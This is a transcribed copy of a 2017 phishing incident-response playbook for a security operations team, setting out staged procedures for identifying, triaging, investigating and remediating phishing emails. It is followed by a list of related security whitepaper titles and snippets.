Incident Play Book: Phishing
|
|
- Amy Norris
- 5 years ago
- Views:
Transcription
1 Incident Play Book: Phishing Issue: 1.0 Issue Date: September 12, 2017
2 Copyright 2017 Independent Electricity System Operator. Some Rights Reserved. The following work is licensed under the Creative Commons Attribution 4.0 International License. Under the terms of this license, you are permitted to: Share copy and redistribute the material in any medium or format Adapt remix, transform, and build upon the material for any purpose, even commercially. The IESO as licensor cannot revoke these freedoms as long as you follow the following license terms: Attribution You must give appropriate credit, provide a link to the license, and indicate if changes were made. You may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use. To view a copy of this license, visit
3 Table of Contents Contents 1. Introduction Purpose of the Phishing Playbook Scope Assumptions and Limitations Phishing Playbook Phishing Definition Process Summary Phishing Playbook Procedures Identification Stage Triage Stage Investigation Stage Remediation Stage Post-Incident Stage... 15
4 List of Figures Figure 2-1: Phishing Incident Response Workflow... 5 Figure 2-2: Identification Process... 6 Figure 2-3: Triage Process... 9 Figure 2-4: Investigation Process Figure 2-5: Remediation Process Figure 2-6: Post-Incident Process List of Tables Table 2-1: Process Stage Descriptions... 4 Table 2-2: Responsibility Index... 5 Table 2-3: Identification Procedures... 6 Table 2-4: Triage Procedures... 9 Table 2-5: Investigation Procedures Table 2-6: Remediation Procedures Table 2-7: Post-Incident Procedures... 15
5 1. Introduction Playbooks define the procedures for security event investigation and response. Each security monitoring use case will generally have a corresponding playbook, which allows a responder to follow a structured methodology for validating and responding to each unique security alert. The playbook for a specific use case is a living document; updates are encouraged in order to capture current procedures and unique guidance, in order to quickly respond and contain the detected event or incident. 1.1 Purpose of the Phishing Playbook Phishing has become a serious concern for organizations in all industries. Threat actors often leverage phishing tactics to entice victims into providing valuable information such as credentials in an effort to gain an initial foothold into the environment. The procedures in this playbook will assist the Security Operations team in responding to Phishing related alerts. The response procedures will include validating Phishing s, understanding the impact, and determining the best containment approach for the incumbent threat. The remediation process ends with resolving any potential impact and implementing preventative controls to protect systems. 1.2 Scope The scope of this document includes any phishing related events or alerts that are either identified during daily security operations, or is otherwise escalated to the Security Operations team. Security Operations owns this procedure and is responsible for maintenance activities, including reviews and revisions. 1.3 Assumptions and Limitations This document is to be used as a reference for the following security roles: Level 1 (L1) Security Operations Center (SOC) 24x7 security monitoring team that reviews and performs initial investigation into security alerts. Level 2 (L2) Incident Analyst Perform incident investigation and response for frequently occurring or more common security events. Level 2 (L2) Incident Specialist Handles confirmed major incidents, or attacks attributed to a targeted attacker. This document version is limited to the current environment and the currently deployed technology in its current configuration state within. Procedures should be regularly updated to include any new and relevant technology. Furthermore, all investigation and analysis activities must be performed in a lab environment with limited internet connectivity or a dedicated internet connection that is not attributable.
6 End of Section 2. Phishing Playbook 2.1 Phishing Definition Phishing is when an attacker attempts to collect sensitive information such as usernames, passwords, credit card details, Social Security Numbers, Protect Health Information and other personal or protected data, often for malicious reasons, by masquerading as a trustworthy entity in an electronic communication. The term is sometimes confused with s that contain malware intended to infect the recipient s system; however, the appropriate term for those types of s is malspam or Malicious SPAM s. Those types of events should follow the Malicious Code Playbook. 2.2 Process Summary The workflow below depicts the five stages of the phishing Incident Response (IR) process. Identification Triage Investigation Remediation Post-Incident Table 2-1: Process Stage Descriptions Process Identification Triage Investigation Remediation Post-Incident Description This stage includes the identification and initial scoping of a security alert. This stage includes verifying if the security alert is an incident, the severity of the incident, and additional analysis. This stage involves investigating the security incident in detail, ensuring all information is documented. Additionally, the investigator will have fully scoped the incident by the end of this stage. This stage includes containment and remediation steps for mitigating and eradicating the threat. This stage includes a final review of the investigation record by the L2 Incident Specialist, ensuring nothing was overlooked. Once completed, the record is closed.
7 Figure 2-1 below illustrates a high-level overview of the Phishing IR workflow. This diagram should be used as a quick reference for Phishing-related investigations. For detailed procedures for each of the sub-processes, refer to the Phishing Playbook Procedures section. Figure 2-1: Phishing Incident Response Workflow Throughout the workflow, a specific level of the security organization as per the diagram above and the table below, will handle each phase of the incident and be responsible for the actions therein. Table 2-2: Phase Identification Triage Investigation Remediation Post-Incident Responsibility Index Responsibility Index (L1) SOC (L2) Incident Analyst (L2) Incident Analyst (L2) Incident Analyst (L2) Incident Specialist
8 2.3 Phishing Playbook Procedures Identification Stage The Identification stage deals with the identification and initial scoping of a security alert. Identification Triage Investigation Remediation Post-Incident Figure 2-2: Table 2-3: Identification Process Identification Procedures - IBM QRadar (L1 SOC) Identification - Case Management Utility (CMU) Relevant Tools Procedures - Symantec Endpoint Protection (SEP) - Symantec Security, BrightMail - Websense - TippingPoint 1. Initial Alert: Phishing Attack a) For SIEM Alerts L1 will be alerted to potential phishing s from the SIEM solution. b) For all other alerts L1 will be alerted to a potential phishing from other, non-siem sources. 2. Create an Investigation Record An investigation record is opened for each discrete alert within the CMU and all pertinent investigative data is recorded there. Duplicate events or events that are components of the same investigation can be aggregated in a previously opened case, provided the investigation record is still in the opened state.
9 3. Validate that the original message headers are present The L1 initially inspects the message s original headers. To do so, the L1 must receive the original sent to them as an attachment to a secondary . If an is received by using the forward feature, the L1 must respond to the initial sender (i.e. internal recipient of suspicious ) and request that they attach the original message to a new as an attachment and send it to the <SOC> Message Data Gathering During the Data Gathering process, the L1 gathers relevant data regarding the alert based on the type of alert and the sources of information available to them. In the case of a phishing, the following details should be collected: - Sender Address - Recipient Address(es) - Subject Line - Sending server IP Address - X-Originating-IP (or similar, if available) 5. Record Message Delivery Ratio and Impacted Users Perform a query on Symantec Security for related messages. Search based on unique identifiers that will identify all messages in the phishing campaign. Multiple searches may be necessary, as a simple search by Subject or Sender may not identify all related messages from the campaign. Attackers will vary fields, such as using differing subject lines throughout the duration of a campaign in order to evade detection. In the case of a phishing, the following details should be collected: - Number of s in the campaign that successfully bypassed Symantec Security and/or BrightMail - Number of s in the campaign blocked by Symantec Security and/or BrightMail - Record User IDs of users that received the phishing 6. Attachment Collection If the original message contains a file attachment, collect the file safely and store it within a password protected zip-file, using the password infected. Attach this file to the investigation record. 7. Domain & URL Profiling Profile the domain and URL that is contained within the message (if applicable):
10 - Record the full URL to the phishing webpage. - Record VirusTotal.com results by searching the URL. o Do not submit the URL to VirusTotal; make sure you only perform a URL search. - Submit URL to URLVoid.com and record Safety Reputation score and Report URL. - Submit IP address to IPVoid.com and record Detection Ratio and Report URL. - Use to search the WHOIS registration information, save it in a.txt file and attack it to the investigation record. - Search the URL on PhishTank.com to validate if it has already been reported as a Phish. - Additionally, search the URL or any related IP addresses using or and report the URL and findings in the investigation record. Sample Template Note: Numbers below may vary as services are upgraded. VirusTotal: <#> / 54 <VirusTotal URL> URLVoid: <#> / 26 <URLVoid url> IPVoid: <#> / 40 <IPVoid url> URLQuery: <Alerts> / <IDS> <URLQuery url> PhishTank Result: <PhishTank URL> 8. Escalate The L1 escalates the investigation to the L2 Incident Analyst.
11 2.3.2 Triage Stage The Triage stage deals with verifying if the security alert is an incident, the severity of the incident, and additional analysis. Identification Triage Investigation Remediation Post-Incident Figure 2-3: Table 2-4: Triage Process Triage Procedures (L2 Incident Analyst) Triage - Case Management Utility (CMU) Relevant Tools - Symantec Security, BrightMail - Dynamic malware analysis sandbox 1. Known False Positive If this alert is a known false positive that is in progress of being tuned out, close the investigation at this point. Procedures 2. Phishing vs. Malicious Based on inspection of the message, does the message constitute a phishing , or an containing malware or links to malicious code? If applicable, submit the attachment (previously attached to the investigation record) to the dynamic malware analysis sandbox and attach the resulting report to the investigation record. If the file attachment is malicious or contains malicious code, refer to the Malicious Code Playbook. 3. Spear-Phishing Verification Does the appear to be sophisticated and highly targeted at the organization and any specific individuals? Does the phishing campaign follow any of these attributes (not limited to): - Small number of users received the - Not a generic mass-mail type message (e.g., mentions our organization) - Impersonation of anyone within our organization
12 - Embedded links or attachments are purporting to be documents related to our organization If the is deemed to be highly targeted, refer to the Targeted Attack Playbook. 4. Declare Incident, Determine the Incident Priority, and Open the Incident Ticket Use the Excel-based Incident Priority Calculator to calculate a priority rating for this case based on the available information collected during the first two phases of the investigation. Open an Incident Ticket in HP Service Manager. 5. Escalate If the Incident Priority rating is P1 or P2, escalate the incident to the L2 Incident Specialist for further investigation Investigation Stage The Investigation stage deals with investigating the security incident in detail, ensuring all information is documented. Additionally, the investigator will have fully scoped the incident by the end of this stage. Identification Triage Investigation Remediation Post-Incident Figure 2-4: Table 2-5: Investigation Process Investigation Procedures (L2 Incident Analyst) Investigation - Symantec Endpoint Protection (SEP) - CheckPoint, Cisco ASA Firewalls Relevant Tools - Symantec Security, BrightMail - Websense - TippingPoint - Mandiant Redline
13 - EnCase Enterprise - Wireshark 1. Analyze Header Examine the header for the following phishing attributes: - Return-Path field contains an address that is not related to the the name shown in the From field in the original . - The X-Authenticated-User field contains an address which appears suspicious (e.g., johnsmith@unknowndomain.ru). - The Mail Server IP address in header is known to be malicious. o Search the IP address on - The domain is known to be malicious. o Search the domain on header details, including external tool search results, must be recorded in the investigation record. Procedures 2. Determine Phishing Page Submission URL Analyze the phishing page URL and determine where the page posts the related data. Option 1: - Load the URL in ToolsVoid URL Content Dump: - Copy and paste the contents from the Downloaded RAW Data section into and click Beautify JavaScript or HTML. - Copy the beautified data into a text editor (e.g., Notepad++) for analysis. - Search for the FORM object. Typically, a search for <form will identify this quickly. Ensure you are looking at the form that has the method= post and is the main submission form, not a search bar or some other form on the page. - Read the action parameter and determine the URL where the form is being posted. - Record this URL in the investigation. Option 2: - Open the URL in your browser and prepend the phrase view-
14 source: to the URL. This will retrieve the files to your browser but it will present the source code to you, and will not execute the code or render the page. - Copy and paste the contents section into and click Beautify JavaScript or HTML. - Copy the beautified data into a text editor (e.g., Notepad++) for analysis. - Search for the FORM object. Typically, a search for <form will identify this quickly. Ensure you are looking at the form that has the method= post and is the main submission form, not a search bar or some other form on the page. - Read the action parameter and determine the URL where the form is being posted. - Record this URL in the investigation. Option 3: - Start Wireshark and commence a Packet capture (disable Promiscuous Mode). - Access the Phishing URL in a web browser with JavaScript enabled. - Fill in the Phishing page form with false data and submit the form. - Close the page and stop the packet capture. - Apply a filter in Wireshark for http.request.uri contains phishing domain o The quotation marks are important and the content within them should be the actual domain from the investigation and not the words phishing domain o This identifies the initial request made by the user when loading the phishing form page - Click on the line item, note the packet number, and clear the filter. - Review the following lines of traffic to understand where the request was submitted. - Apply a filter in Wireshark for http.request.method == POST o This identifies the POST request made by the user when submitting the form. - Alternatively: o Click File o Click Export Objects (near the bottom) o Select HTTP
15 o o o Once the packets have been processed, a dialog box will appear labelled Wireshark: HTTP object list Review the list for a quick summary view of the HTTP transactions that occurred during the packet capture Identify the traffic that immediately follows the access to the phishing domain 3. Review Proxy Logs for Evidence of Access to Phishing Page URL Run a Websense report summarized by user with verdict Allowed on the domain hosting the phishing page. Record the list of user IDs in the investigation record. 4. Review Proxy Logs for Evidence of Phishing Click-Through Submission Page Run a Websense report summarized by user with verdict Allowed on the domain hosting the phishing submission page. Record the list of user IDs in the investigation record. 5. Affected User Profiling Profile the users that have clicked through to the submission page and record this information in the investigation record. - Record User ID - Look up and record user s name, title, department, physical location 6. Escalation Verification Recalculate Priority Rating Using the information that has been gathered at this point, recalculate the incident priority rating using the Excel-based Incident Priority Calculator. If the priority has been raised to a P1 or P2, escalate to the L2 Incident Specialist. Additionally, engage Security Operations Management to initiate the Crisis Response Plan (CRP) as necessary Remediation Stage The Remediation stage deals with containment and remediating steps for mitigating and eradicating the incident. Identification Triage Investigation Remediation Post-Incident
16 Figure 2-5: Table 2-6: Remediation Process Remediation Procedures (L2 Incident Analyst) Remediation - Case Management Utility (CMU) - HP Service Manager Relevant Tools - Symantec Security, Brightmail - Websense - PhishTank 1. Implement a Symantec Security Block Provide Symantec with a copy of the for them to create a blocking rule on future messages of this type. If Symantec Security is unable to provide an explicit block on these exact messages from being received in the future, implement a custom rule within Symantec Security to prevent further messages matching the sample Update Web Proxy Submit the URL of the phishing page to Websense for categorization. Procedures 3. Submit URL to PhishTank Submit the URL of the phishing page to PhishTank for categorization. 4. Change Affected User s Credentials Affected users should change their passwords for all systems that may have been compromised by the information submitted to the phishing submission page. 5. Monitor System and User Account for Possible Misuse Monitor the system and user account of the victim of the phishing attack for any possible misuse related to the possible harvesting of credentials related to the phishing attack. 6. Update the Investigation Record The investigation record will be updated with all actions performed.
17 2.3.5 Post-Incident Stage The Post-Incident stage includes a final review of the investigation record by the L2 Incident Specialist, ensuring nothing was overlooked. Once completed, the record is closed. Identification Triage Investigation Remediation Post-Incident Figure 2-6: Table 2-7: Post-Incident Process Post-Incident Procedures (L2 Incident Specialist) Post-Incident Relevant Tools - Case Management Utility (CMU) - HP Service Manager 1. Review Investigation Record Review the investigation record in the CMU and verify that all pertinent information, including details about the investigation as well as steps taken by the investigator are recorded accurately. 2. Document Failed Controls Update the investigation record with the controls that failed to prevent or detect this incident from occurring. Procedures 3. Close the Investigation Record Resolve the investigation record in the CMU and any incident remediation tickets in the HP Service Manager. 4. Create Incident Review Report For incidents with a P1 or P2 rating, an After Action Report should be created. Refer to the Playbooks Supporting Content document for more details. 5. Improve/Update Determine if there were area(s) for improvement or if updates are needed: i. Update documentation (e.g., use cases, playbooks, SOPs) ii. Create new SIEM Alerts/IOCs as needed iii. Review Technical & Policy Controls - Review additional
18 technology changes, countermeasures, additional controls, or policy changes End of Document
Incident Report Issue: 1.0 Issue Date: September 12, 2017
Incident Report Issue: 1.0 Issue Date: September 12, 2017 Copyright 2017 Independent Electricity System Operator. Some Rights Reserved. The following work is licensed under the Creative Commons Attribution
More informationINCIDENTRESPONSE.COM. Automate Response. Did you know? Your playbook overview - Unauthorized Access
Automate Response Congratulations on selecting IncidentResponse.com to retrieve your custom incident response playbook guide. This guide has been created especially for you for use in within your security
More information10 KEY WAYS THE FINANCIAL SERVICES INDUSTRY CAN COMBAT CYBER THREATS
10 KEY WAYS THE FINANCIAL SERVICES INDUSTRY CAN COMBAT CYBER THREATS WHITE PAPER INTRODUCTION BANKS ARE A COMMON TARGET FOR CYBER CRIMINALS AND OVER THE LAST YEAR, FIREEYE HAS BEEN HELPING CUSTOMERS RESPOND
More informationINCIDENTRESPONSE.COM. Automate Response. Did you know? Your playbook overview - Elevation of Privilege
Automate Response Congratulations on selecting IncidentResponse.com to retrieve your custom incident response playbook guide. This guide has been created especially for you for use in within your security
More informationINCIDENTRESPONSE.COM. Automate Response. Did you know? Your playbook overview - Data Theft
Automate Response Congratulations on selecting IncidentResponse.com to retrieve your custom incident response playbook guide. This guide has been created especially for you for use in within your security
More informationOrchestrating and Automating Trend Micro TippingPoint and IBM QRadar
Orchestrating and Automating Trend Micro TippingPoint and IBM QRadar Response Automation SOCAutomation is an information security automation and orchestration platform that transforms incident response.
More informationBehavioral Analytics A Closer Look
SESSION ID: GPS2-F03 Behavioral Analytics A Closer Look Mike Huckaby VP, Global Systems Engineering RSA The world is full of obvious things which nobody by any chance ever observes. Sherlock Holmes 2 Patterns
More informationATTIVO NETWORKS THREATDEFEND INTEGRATION WITH MCAFEE SOLUTIONS
PARTNER BRIEF ATTIVO NETWORKS THREATDEFEND INTEGRATION WITH MCAFEE SOLUTIONS INTRODUCTION Attivo Networks has partnered with McAfee to detect real-time in-network threats and to automate incident response
More informationRSA INCIDENT RESPONSE SERVICES
RSA INCIDENT RESPONSE SERVICES Enabling early detection and rapid response EXECUTIVE SUMMARY Technical forensic analysis services RSA Incident Response services are for organizations that need rapid access
More informationO N L I N E I N C I D E N T R E S P O N S E C O M M U N I T Y
Automate Response Congratulations on selecting IncidentResponse.com to retrieve your custom incident response playbook guide. This guide has been created especially for you for use in within your security
More informationRSA INCIDENT RESPONSE SERVICES
RSA INCIDENT RESPONSE SERVICES Enabling early detection and rapid response EXECUTIVE SUMMARY Technical forensic analysis services RSA Incident Response services are for organizations that need rapid access
More informationRSA NetWitness Suite Respond in Minutes, Not Months
RSA NetWitness Suite Respond in Minutes, Not Months Overview One can hardly pick up a newspaper or turn on the news without hearing about the latest security breaches. The Verizon 2015 Data Breach Investigations
More informationOUTSMART ADVANCED CYBER ATTACKS WITH AN INTELLIGENCE-DRIVEN SECURITY OPERATIONS CENTER
OUTSMART ADVANCED CYBER ATTACKS WITH AN INTELLIGENCE-DRIVEN SECURITY OPERATIONS CENTER HOW TO ADDRESS GARTNER S FIVE CHARACTERISTICS OF AN INTELLIGENCE-DRIVEN SECURITY OPERATIONS CENTER 1 POWERING ACTIONABLE
More informationSecurity & Phishing
Email Security & Phishing Best Practices In Cybersecurity Presenters Bill Shieh Guest Speaker Staff Engineer Information Security Ellie Mae Supervisory Special Agent Cyber Crime FBI 2 What Is Phishing?
More informationSOLUTION BRIEF RSA NETWITNESS SUITE 3X THE IMPACT WITH YOUR EXISTING SECURITY TEAM
SOLUTION BRIEF RSA NETWITNESS SUITE 3X THE IMPACT WITH YOUR EXISTING SECURITY TEAM OVERVIEW The Verizon 2016 Data Breach Investigations Report highlights that attackers are regularly outpacing the defenders.
More informationTHE RSA SUITE NETWITNESS REINVENT YOUR SIEM. Presented by: Walter Abeson
THE RSA NETWITNESS SUITE REINVENT YOUR SIEM Presented by: Walter Abeson 1 Reality Goals GOALS VERSUS REALITY OF SIEM 1.0 Single compliance & security interface Analyze & prioritize alerts across various
More informationCYBER RESILIENCE & INCIDENT RESPONSE
CYBER RESILIENCE & INCIDENT RESPONSE www.nccgroup.trust Introduction The threat landscape has changed dramatically over the last decade. Once the biggest threats came from opportunist attacks and preventable
More informationFROM SIEM TO SOC: CROSSING THE CYBERSECURITY CHASM
SESSION ID: TECH-F02 FROM SIEM TO SOC: CROSSING THE CYBERSECURITY CHASM Mike Ostrowski VP Proficio @proficioinc EXPERIENCE FROM THE CHASM Managed Detection and Response Service Provider Three Global Security
More informationCloudSOC and Security.cloud for Microsoft Office 365
Solution Brief CloudSOC and Email Security.cloud for Microsoft Office 365 DID YOU KNOW? Email is the #1 delivery mechanism for malware. 1 Over 40% of compliance related data in Office 365 is overexposed
More informationAd Hoc to Coordinated
White paper Ad Hoc to Coordinated A Practical Process for Incident Response www.proofpoint.com If you re a security analyst working in incident response, you face a deluge of security alerts every day
More informationCYBER ANALYTICS. Architecture Overview. Technical Brief. May 2016 novetta.com 2016, Novetta
CYBER ANALYTICS Architecture Overview Technical Brief May 2016 novetta.com 2016, Novetta Novetta Cyber Analytics: Technical Architecture Overview 1 INTRODUCTION 2 CAPTURE AND PROCESS ALL NETWORK TRAFFIC
More informationProtecting Against Modern Attacks. Protection Against Modern Attack Vectors
Protecting Against Modern Attacks Protection Against Modern Attack Vectors CYBER SECURITY IS A CEO ISSUE. - M C K I N S E Y $4.0M 81% >300K 87% is the average cost of a data breach per incident. of breaches
More informationAUTHENTICATION. Do You Know Who You're Dealing With? How Authentication Affects Prevention, Detection, and Response
AUTHENTICATION Do You Know Who You're Dealing With? How Authentication Affects Prevention, Detection, and Response Who we are Eric Scales Mandiant Director IR, Red Team, Strategic Services Scott Koller
More informationADVANCED THREAT PREVENTION FOR ENDPOINT DEVICES 5 th GENERATION OF CYBER SECURITY
ADVANCED THREAT PREVENTION FOR ENDPOINT DEVICES 5 th GENERATION OF CYBER SECURITY OUTLINE Advanced Threat Landscape (genv) Why is endpoint protection essential? Types of attacks and how to prevent them
More informationBuilding Resilience in a Digital Enterprise
Building Resilience in a Digital Enterprise Top five steps to help reduce the risk of advanced targeted attacks To be successful in business today, an enterprise must operate securely in the cyberdomain.
More information4/13/2018. Certified Analyst Program Infosheet
4/13/2018 Certified Analyst Program Infosheet Contents I. Executive Summary II. Training Framework III. Course Structure, Learning Outcomes, and Skills List IV. Sign-up and More Information Executive Summary
More informationINCIDENTRESPONSE.COM. Automate Response. Did you know? Your playbook overview - Virus Outbreak
Automate Response Congratulations on selecting IncidentResponse.com to retrieve your custom incident response playbook guide. This guide has been created especially for you for use in within your security
More informationEliminating the Blind Spot: Rapidly Detect and Respond to the Advanced and Evasive Threat
WHITE PAPER Eliminating the Blind Spot: Rapidly Detect and Respond to the Advanced and Evasive Threat Executive Summary Unfortunately, it s a foregone conclusion that no organisation is 100 percent safe
More informationTrend Micro Deep Discovery Training for Certified Professionals
Trend Micro Deep Discovery Training for Certified Professionals Length Courseware 3 days Hard or soft copy provided. Course Description Trend Micro Deep Discovery Training for Certified Professionals is
More informationImperva Incapsula Website Security
Imperva Incapsula Website Security DA T A SH E E T Application Security from the Cloud Imperva Incapsula cloud-based website security solution features the industry s leading WAF technology, as well as
More informationPhishing. Eugene Davis UAH Information Security Club April 11, 2013
Phishing Eugene Davis UAH Information Security Club April 11, 2013 Overview A social engineering attack in which the attacker impersonates a trusted entity Attacker attempts to retrieve privileged information
More informationForeScout Extended Module for Carbon Black
ForeScout Extended Module for Carbon Black Version 1.0 Table of Contents About the Carbon Black Integration... 4 Advanced Threat Detection with the IOC Scanner Plugin... 4 Use Cases... 5 Carbon Black Agent
More informationwith Advanced Protection
with Advanced Email Protection OVERVIEW Today s sophisticated threats are changing. They re multiplying. They re morphing into new variants. And they re targeting people, not just technology. As organizations
More informationTHE EFFECTIVE APPROACH TO CYBER SECURITY VALIDATION BREACH & ATTACK SIMULATION
BREACH & ATTACK SIMULATION THE EFFECTIVE APPROACH TO CYBER SECURITY VALIDATION Cymulate s cyber simulation platform allows you to test your security assumptions, identify possible security gaps and receive
More informationThis course incorporates a variety of hands-on lab exercises allowing participants to put the lesson content into action.
Trend Micro Trend Micro Deep Discovery Training for Certified Professionals Course ID: TMCPDD Course Overview Course Duration: 3 Days Trend Micro Deep Discovery Training for Certified Professionals is
More informationSobering statistics. The frequency and sophistication of cybersecurity attacks are getting worse.
Sobering statistics The frequency and sophistication of cybersecurity attacks are getting worse. 146 >63% $500B $3.8M The median # of days that attackers reside within a victim s network before detection
More informationManaged Security Services - Automated Analysis, Threat Analyst Monitoring and Notification
Service Description Managed Security Services - Automated Analysis, Threat Analyst Monitoring and Notification The services described herein are governed by the terms and conditions of the agreement specified
More informationDelivering Integrated Cyber Defense for the Cloud Generation Darren Thomson
Delivering Integrated Cyber Defense for the Generation Darren Thomson Vice President & CTO, EMEA Region Symantec In 2009 there were 2,361,414 new piece of malware created. In 2015 that number was 430,555,582
More informationSymantec Ransomware Protection
Symantec Ransomware Protection Protection Against Ransomware Defense in depth across all control points is required to stop ransomware @ Email Symantec Email Security.cloud, Symantec Messaging Gateway
More informationRSA Security Analytics
RSA Security Analytics This is what SIEM was Meant to Be 1 The Original Intent of SIEM Single compliance & security interface Analyze & prioritize alerts across various sources The cornerstone of security
More informationWHITE PAPER HIGH-FIDELITY THREAT INTELLIGENCE: UNDERSTANDING FALSE POSITIVES IN A MULTI-LAYER SECURITY STRATEGY
WHITE PAPER HIGH-FIDELITY THREAT INTELLIGENCE: UNDERSTANDING FALSE POSITIVES IN A MULTI-LAYER SECURITY STRATEGY Dave Dubois, Global Security Product Management Version: 1.0, Jan 2018 A Multi-Layer Approach
More informationCyber Security Guide. For Politicians and Political Parties
Cyber Security Guide For Politicians and Political Parties Indian Election Integrity Initiative Design by ccm.design Cover Image by Paul Dufour Helping to Safeguard the Integrity of the Electoral Process
More informationTHE SIX ESSENTIAL CAPABILITIES OF AN ANALYTICS-DRIVEN SIEM
THE SIX ESSENTIAL CAPABILITIES OF AN ANALYTICS-DRIVEN SIEM Modern threats demand analytics-driven security and continuous monitoring Legacy SIEMs are Stuck in the Past Finding a mechanism to collect, store
More informationBUILDING AND MAINTAINING SOC
BUILDING AND MAINTAINING SOC Digit Oktavianto KOMINFO 7 December 2016 digit dot oktavianto at gmail dot com 1 Digit Oktavianto Profile in 1 Page Currently working as a Security Architect Professional Certifications:
More informationIncident Response Lessons From the Front Lines. Session 276, March 8, 2018 Nolan Garrett, CISO, Children s Hospital Los Angeles
Incident Response Lessons From the Front Lines Session 276, March 8, 2018 Nolan Garrett, CISO, Children s Hospital Los Angeles 1 Conflict of Interest Nolan Garrett Has no real or apparent conflicts of
More informationComodo cwatch Web Security Software Version 1.6
rat Comodo cwatch Web Security Software Version 1.6 Website Administrator Guide Guide Version 1.6.103017 Comodo Security Solutions 1255 Broad Street Clifton, NJ 07013 Table of Contents 1 Introduction to
More informationSecurity Monitoring. Managed Vulnerability Services. Managed Endpoint Protection. Platform. Platform Managed Endpoint Detection and Response
Security Operations Flexible and Scalable Solutions to Improve Your Security Capabilities Security threats continue to rise each year and are increasing in sophistication and malicious intent. Unfortunately,
More informationIncident Response. Is Your CSIRT Program Ready for the 21 st Century?
Incident Response Is Your CSIRT Program Ready for the 21 st Century? Speaker Bio Traditional Response Concepts Technical Incidents Requiring Technical Responses Virus/ Malware Network Intrusion Disaster
More informationAdvanced Malware Protection. Dan Gavojdea, Security Sales, Account Manager, Cisco South East Europe
Advanced Malware Protection Dan Gavojdea, Security Sales, Account Manager, Cisco South East Europe How would you do security differently if you knew you were going to be hacked? Security Challenges Changing
More informationSOLUTION BRIEF REMOTE ACCESS: WEBSHELLS SEE EVERYTHING, FEAR NOTHING
REMOTE ACCESS: WEBSHELLS SEE EVERYTHING, FEAR NOTHING RSA Visibility Reconnaissance Weaponization Delivery Exploitation Installation C2 Action WHAT IS A WEBSHELL? A WebShell is a piece of code or a script
More informationCyberArk Privileged Threat Analytics
CyberArk Privileged Threat Analytics Table of Contents The New Security Battleground: Inside Your Network 3 Privileged account security 3 Collect the right data 4 Detect critical threats 5 Alert on critical
More informationFAQ. Usually appear to be sent from official address
FAQ 1. What is Phishing Email? A form of fraud by which an attacker masquerades as a reputable entity in order to obtain your personal information. Usually appear to be sent from official email address
More informationRSA ADVANCED SOC SERVICES
RSA ADVANCED SOC SERVICES Consulting services to improve threat detection and response EXECUTIVE SUMMARY A holistic approach to enhanced cybersecurity operations This service is for organizations needing
More informationKaspersky Security Network
The Kaspersky Security Network (KSN) is a complex distributed infrastructure dedicated to intelligently processing cybersecurity-related data streams from millions of voluntary participants around the
More informationGladiator Incident Alert
Gladiator Incident Alert Allen Eaves Sabastian Fazzino FINANCIAL PERFORMANCE RETAIL DELIVERY IMAGING PAYMENT SOLUTIONS INFORMATION SECURITY & RISK MANAGEMENT ONLINE & MOBILE 1 2016 Jack Henry & Associates,
More informationSophos Central Admin. help
help Contents About Sophos Central...1 Activate Your License... 2 Overview...3 Dashboard... 3 Alerts...4 Logs & Reports... 15 People...31 Devices... 41 Global Settings... 57 Protect Devices... 90 Endpoint
More informationWHITEPAPER ENDPOINT DETECTION AND RESPONSE BEYOND ANTIVIRUS PROACTIVE THREAT HUNTING AT THE ENDPOINT
WHITEPAPER ENDPOINT DETECTION AND RESPONSE BEYOND ANTIVIRUS PROACTIVE THREAT HUNTING AT THE ENDPOINT THREE DECADES OF COMPUTER THREATS In 1986, the Brain boot sector virus caused the first widespread realization
More informationQuickSpecs. Aruba IntroSpect User and Entity Behavior Analytics. Overview. Aruba IntroSpect User and Entity Behavior Analytics Product overview
Overview Product overview Aruba s User and Entity Behavior Analytics (UEBA) solution, Aruba IntroSpect, detects attacks by spotting small changes in behavior that are often indicative of attacks that have
More informationNovetta Cyber Analytics
Know your network. Arm your analysts. Introduction Novetta Cyber Analytics is an advanced network traffic analytics solution that empowers analysts with comprehensive, near real time cyber security visibility
More informationUsing Centralized Security Reporting
This chapter contains the following sections: Centralized Email Reporting Overview, on page 1 Setting Up Centralized Email Reporting, on page 2 Working with Email Report Data, on page 4 Understanding the
More informationINCIDENT RESPONDER'S FIELD GUIDE INCIDENT RESPONDER'S INCIDENT RESPONSE PLAN FIELD GUIDE LESSONS FROM A FORTUNE 100 INCIDENT RESPONSE LEADER
INCIDENT RESPONDER'S FIELD GUIDE INCIDENT RESPONDER'S INCIDENT RESPONSE PLAN FIELD GUIDE LESSONS FROM A FORTUNE 100 INCIDENT RESPONSE LEADER 1 INCIDENT RESPONDER'S FIELD GUIDE TABLE OF CONTENTS 03 Introduction
More informationThe Resilient Incident Response Platform
The Resilient Incident Response Platform Accelerate Your Response with the Industry s Most Advanced, Battle-Tested Platform for Incident Response Orchestration The Resilient Incident Response Platform
More informationMCAFEE INTEGRATED THREAT DEFENSE SOLUTION
IDC Lab Validation Report, Executive Summary MCAFEE INTEGRATED THREAT DEFENSE SOLUTION Essential Capabilities for Analyzing and Protecting Against Advanced Threats By Rob Ayoub, CISSP, IDC Security Products
More informationRobust Defenses for Cross-Site Request Forgery Review
Robust Defenses for Cross-Site Request Forgery Review Network Security Instructor:Dr. Shishir Nagaraja Submitted By: Jyoti Leeka October 16, 2011 1 Introduction to the topic and the reason for the topic
More informationINCIDENTRESPONSE.COM. Automate Response. Did you know? Your playbook overview - Malware Outbreak
Automate Response Congratulations on selecting IncidentResponse.com to retrieve your custom incident response playbook guide. This guide has been created especially for you for use in within your security
More informationNovember 1, 2018, RP Provision of Managed Security Services on an Annual Contract ADDENDUM #2
November 1, 2018, RP029-18 Provision of Managed Security Services on an Annual Contract ADDENDUM #2 Please see the below summation of the technical questions and answers that have been received regarding
More informationProtecting Against Online Fraud. F5 EMEA Webinar August 2014
Protecting Against Online Fraud F5 EMEA Webinar August 2014 Agenda Fraud threat trends and business challenges Web fraud protection Mobile fraud protection Security operations center Example architecture
More informationOffice 365 Buyers Guide: Best Practices for Securing Office 365
Office 365 Buyers Guide: Best Practices for Securing Office 365 Microsoft Office 365 has become the standard productivity platform for the majority of organizations, large and small, around the world.
More informationForeScout Extended Module for Symantec Endpoint Protection
ForeScout Extended Module for Symantec Endpoint Protection Version 1.0.0 Table of Contents About the Symantec Endpoint Protection Integration... 4 Use Cases... 4 Additional Symantec Endpoint Protection
More informationExternal Supplier Control Obligations. Cyber Security
External Supplier Control Obligations Cyber Security Control Title Control Description Why this is important 1. Cyber Security Governance The Supplier must have cyber risk governance processes in place
More informationCIS Controls Measures and Metrics for Version 7
